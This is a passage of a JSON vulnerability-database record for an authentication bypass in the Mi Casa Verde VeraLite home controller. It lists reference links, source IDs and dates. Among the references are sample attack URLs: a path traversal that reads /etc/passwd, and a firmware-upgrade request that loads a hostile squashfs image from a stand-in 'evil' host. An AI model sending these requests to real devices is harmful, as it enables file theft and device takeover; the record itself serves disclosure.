"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4861"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com"
},
{
"trust": 0.1,
"url": "http://a.b.c.d/cgi-bin/cmh/store_file.sh?store_file=test"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/spiderlabs"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4862"
},
{
"trust": 0.1,
"url": "http://www.micasaverde.com/)"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4865"
},
{
"trust": 0.1,
"url": "http://www.micasaverde.com/"
},
{
"trust": 0.1,
"url": "http://a.b.c.d/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs\""
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/envelope/\"\u003e\u003cs:body\u003e"
},
{
"trust": 0.1,
"url": "http://a.b.c.d/cgi-bin/cmh/get_file.sh?filename=../../../../../etc/passwd"
},
{
"trust": 0.1,
"url": "http://a.b.c.d/cgi-bin/cmh/proxy.sh?url=https://www.trustwave.com"
},
{
"trust": 0.1,
"url": "http://a.b.c.d/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12045"
},
{
"db": "VULMON",
"id": "CVE-2013-4863"
},
{
"db": "BID",
"id": "61591"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007151"
},
{
"db": "PACKETSTORM",
"id": "122654"
},
{
"db": "NVD",
"id": "CVE-2013-4863"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-038"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-12045"
},
{
"db": "VULMON",
"id": "CVE-2013-4863"
},
{
"db": "BID",
"id": "61591"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007151"
},
{
"db": "PACKETSTORM",
"id": "122654"
},
{
"db": "NVD",
"id": "CVE-2013-4863"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-038"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-12045"
},
{
"date": "2020-01-28T00:00:00",
"db": "VULMON",
"id": "CVE-2013-4863"
},
{
"date": "2013-08-01T00:00:00",
"db": "BID",
"id": "61591"
},
{
"date": "2020-02-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007151"
},
{
"date": "2013-08-02T15:13:14",
"db": "PACKETSTORM",
"id": "122654"
},
{
"date": "2020-01-28T17:15:11.630000",
"db": "NVD",
"id": "CVE-2013-4863"
},
{
"date": "2013-08-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-038"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-12045"
},
{
"date": "2020-02-04T00:00:00",
"db": "VULMON",
"id": "CVE-2013-4863"
},
{
"date": "2013-08-01T00:00:00",
"db": "BID",
"id": "61591"
},
{
"date": "2020-02-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007151"
},
{
"date": "2020-02-04T16:23:11.353000",
"db": "NVD",
"id": "CVE-2013-4863"
},
{
"date": "2020-05-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-038"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201308-038"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mi Casa Verde VeraLite Remote Authentication Bypass Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12045"
},
{
"db": "BID",
"id": "61591"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201308-038"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.